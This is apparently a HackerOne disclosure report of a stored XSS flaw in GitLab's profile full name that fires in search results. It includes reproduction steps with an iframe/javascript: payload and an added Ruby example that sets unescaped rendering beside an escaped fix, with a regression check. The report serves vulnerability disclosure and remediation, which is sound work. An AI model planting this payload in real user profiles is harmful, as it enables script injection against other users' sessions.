Stored XSS in Full name when performing a search (without bypass csp)
HackerOne report #1218156 by solov9ev on 2021-06-05, assigned to @ankelly:
Report
Summary
Hi, Security Team!
I discovered a stored XSS vulnerability (without a CSP bypass) that triggers when a user searches for information.
Steps to reproduce
- Run GitLab:
  docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest
  (GitLab Community Edition 13.12.2)
- Go to /-/profile and insert the following malicious payload:
  1337<iframe srcdoc="<h1 onmouseover=prompt()><a href=javascript:alert()>click me</a>"></iframe>
- Create an issue: My new Issue
- Go to
  /search?utf8=✓&search=My+new+&group_id=&project_id=2&scope=issues&search_code=false&snippets=false&repository_ref=&nav_source=navbar
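The rendering-side fix, shown as an added example (not GitLab's own code): a search-result row that interpolates the author's full name unescaped, beside one that HTML-escapes every untrusted value with ERB::Util.html_escape, plus a regression check that no tag other than the template's own appears in the output. The row template, the method names and the check are assumptions for this example; the full-name payload is the one from the report.

```ruby
require 'erb'

# Full-name payload from the report, reused here as the test input.
REPORTED_FULL_NAME = '1337<iframe srcdoc="<h1 onmouseover=prompt()>' \
                     '<a href=javascript:alert()>click me</a>"></iframe>'

# Tags the (assumed) search-result template itself emits.
TEMPLATE_TAGS = %w[li span].freeze

# Vulnerable rendering: the user's full name is interpolated into the markup
# as-is, so the browser parses whatever the user typed as HTML.
def render_result_vulnerable(issue_title, full_name)
  "<li class=\"search-result\">#{issue_title} by " \
    "<span class=\"author\">#{full_name}</span></li>"
end

# Fixed rendering: every untrusted value is escaped before interpolation.
# ERB::Util.html_escape encodes & < > " and ', which covers both the
# text-node and the double-quoted attribute context used below.
def render_result_fixed(issue_title, full_name)
  title = ERB::Util.html_escape(issue_title)
  name  = ERB::Util.html_escape(full_name)
  "<li class=\"search-result\" title=\"#{title} by #{name}\">#{title} by " \
    "<span class=\"author\">#{name}</span></li>"
end

# Regression check: collect every tag name that appears as live markup and
# report any the template did not put there. Escaped input contains no
# literal '<', so it can never contribute a tag.
def foreign_tags(html)
  html.scan(%r{</?([a-z][a-z0-9]*)}i).flatten.map(&:downcase).uniq - TEMPLATE_TAGS
end

def untrusted_markup?(html)
  !foreign_tags(html).empty?
end

if __FILE__ == $PROGRAM_NAME
  %w[render_result_vulnerable render_result_fixed].each do |renderer|
    html = send(renderer, 'My new Issue', REPORTED_FULL_NAME)
    puts "#{renderer}: foreign tags = #{foreign_tags(html).inspect}"
  end
end
```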
Impact
With this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
- _________________2021-06-05_17-56-16.png
- _________________2021-06-05_17-58-05.png
- _________________2021-06-05_17-59-01.png
- _________________2021-06-05_17-59-16.png
How To Reproduce